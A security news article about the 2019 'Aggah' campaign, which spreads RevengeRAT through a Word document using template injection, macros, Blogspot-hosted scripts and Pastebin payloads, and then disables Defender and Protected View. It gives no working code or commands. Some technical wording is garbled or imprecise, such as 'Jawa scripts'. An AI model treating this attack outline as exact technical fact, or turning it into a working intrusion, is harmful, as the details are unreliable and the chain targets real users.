• About
  • Advertise
  • Careers
  • Contact
Saturday, June 3, 2023
No Result
View All Result
NEWSLETTER
Cyber360 News
  • Home
  • Security
  • Data Breach
  • Cyber Attacks
  • Cyber Security
  • Cyber Crime
  • Contact Us
  • Home
  • Security
  • Data Breach
  • Cyber Attacks
  • Cyber Security
  • Cyber Crime
  • Contact Us
No Result
View All Result
Cyber360 News
No Result
View All Result
Home Security

Windows Malware ‘Aggah’ Infects Your PCs Through Microsoft Word Docs

by Cyber360 News
November 11, 2019
in Security
0
Windows Malware ‘Aggah’ Infects Your PCs Through Microsoft Word Docs
0
SHARES
0
VIEWS
Share on FacebookShare on Twitter

The latest in a series of online attacks is ‘Aggah’, a global malware campaign with roots in the Middle East. The Windows Malware comprises a commodity Trojan script being spread via an infected Microsoft Word Document. The perpetrators are tricking users into downloading and activating the malicious code using RevengeRAT.

Since RevengeRat is comprised of several open source Trojan builds, it is very difficult to pinpoint the actual spammer. The people involved in this are using the alias name ‘haggah’ to carry out their operation.

jamf now

Windows Malware: How ‘Aggah’ Works?

A malware attack in the Aggah campaign consists of three main steps.

  • E-mail a Word doc titled ‘Activity.doc’ to the target
  • Prompt users to enable content thus helping the doc to run macros
  • A Shell command redirects the user to a Blogspot site which downloads malicious scripts

The malware in the Aggah campaign works very discreetly and in a large number of steps initiated by a macro.

The Weakness Being Exploited

Windows Malware Details
Images: Shutterstock

In Microsoft Open Office XML (OOXML), the older format docs (.doc, .ppt) has been replaced with the new XML based format (.docx,.pptx).

The OOXML files are made up of ZIP archives, called as ‘Parts’, which are responsible for rendering a document when it is opened.

Rendering of Parts is regulated by ‘Properties’ which may or may not reference public shared resources using URLs. This can be exploited by hackers. Whenever such a document is opened it leaves room for hackers to load a malicious script instead of the actual document via Template Injection.

Template Injection Definition

Template Injection is the process of replacing the blueprint of a document from the server side with malicious code, to be injected in the document of an unsuspecting user.

The latest Windows Malware uses the following steps to exploit the above-mentioned feature:

  1. The user receives an E-mail titled ‘Your account is locked’ attached with a word document ‘Activity.doc’.

    SHA256 of ‘Activity.doc’ file

    5f762589cdb8955308db4bba140129f172bf2dbc1e979137b6cc7949f7b19e6f

  2. The Document contains this photo asking users to ‘view in desktop’, ‘Enable editing’ and ‘Enable Content’
  3. Enabling content is the ultimate goal, then it fetches and loads an OLE document from a remote server, which contains an RTF (Rich Text Format), using Template Injection.
  4. The RTF runs an excel sheet containing a heavily encrypted macro that loads a URL using Shell command to access the OS’ kernel.
  5. The Shell command downloads the contents of the URL of a Blogspot site.
  6. The Blogspot side contains several Jawa scripts that disable the Microsoft Defender by changing its signature and also disable MS Office functions.
  7. Then the Jawa Script changes key registry values of MS office apps to 1.
  8. After that, the script disables Microsoft ProtectedView.
  9. The script uses Pastebin to download the malicious code and run Shell commands.

This malware campaign is targeting financial institutions, government bodies, education institutions, marketing agencies, etc.

The Windows malware campaign was spotted by Cybersecurity Researchers, Unit42, based in Palo Alto.

How To Stay Safe

Currently, it is advised to not open any word document similar to the one mentioned above. Also, don’t enable ‘content’ in MS Word and only open suspicious docs using Office 365 as Macros can’t be enabled in it.

Malware attacks have seen a significant rise in recent years. From pirated Game of Thrones to Microsoft Word documents, everything that has the potential for directing heavy traffic is being laced with Malware.

Several Ransomware has also caused havoc, particularly in the industrial engineering industry, causing hundreds of thousands of dollars in damage. On top of that, several new types of Ransomware are also on the rise, disguising themselves as PC enhancing mods while encrypting away user files.

jamf now

In today’s fast-evolving world it is best advised to stay one step ahead to stay safe.

Also Read: The Pirate Bay Users Targeted By Russian Doll ‘PirateMatryoshka’ Malware
Cyber360 News

Cyber360 News

Next Post
Your Mental Health App Might Be Selling Your Data To Google Or Facebook

Your Mental Health App Might Be Selling Your Data To Google Or Facebook

Recent Posts

Twitch’s Entire Critical Data Leaked, Includes Streamer Earnings, Source Code

Twitch’s Entire Critical Data Leaked, Includes Streamer Earnings, Source Code

October 6, 2021
Former U.S. Security Firm Helped The UAE Carry Out “Karma” iMessage Hack: MIT Tech Review

Former U.S. Security Firm Helped The UAE Carry Out “Karma” iMessage Hack: MIT Tech Review

October 1, 2021
Facing “This App Has Been Blocked For Your Protection” Issue? Here’s How You Can Fix It

Facing “This App Has Been Blocked For Your Protection” Issue? Here’s How You Can Fix It

October 1, 2021

Whats New in Kali Linux?

September 14, 2021

Kali Linux 2019.3 Release (CloudFlare, Kali-status, metapackages, Helper-Scripts & LXD)

September 14, 2021

Kali Linux 2021.3 Release (OpenSSL, Kali-Tools, Kali Live VM Support, Kali NetHunter Smartwatch)

September 14, 2021

Kali Linux 2018.4 Release

September 14, 2021

Kali Linux 1.0.5 and Software Defined Radio

September 14, 2021

Kali Tools Website Launched, 1.0.9 Release

September 14, 2021

Kali Linux Dojo at Black Hat Vegas 2016

September 14, 2021

Category

Site Links

  • Log in
  • Entries feed
  • Comments feed
  • WordPress.org

About Us

We bring you the best Premium WordPress Themes that perfect for news, magazine, personal blog, etc. Check our landing page for details.

© 2019 Cyber360 News - Powered by WebSensePro

No Result
View All Result
  • Home
  • Security
  • Data Breach
  • Cyber Attacks
  • Cyber Security
  • Cyber Crime
  • Contact Us

© 2019 Cyber360 News - Powered by WebSensePro

Login to your account below

Forgotten Password?

Fill the forms bellow to register

All fields are required. Log In

Retrieve your password

Please enter your username or email address to reset your password.

Log In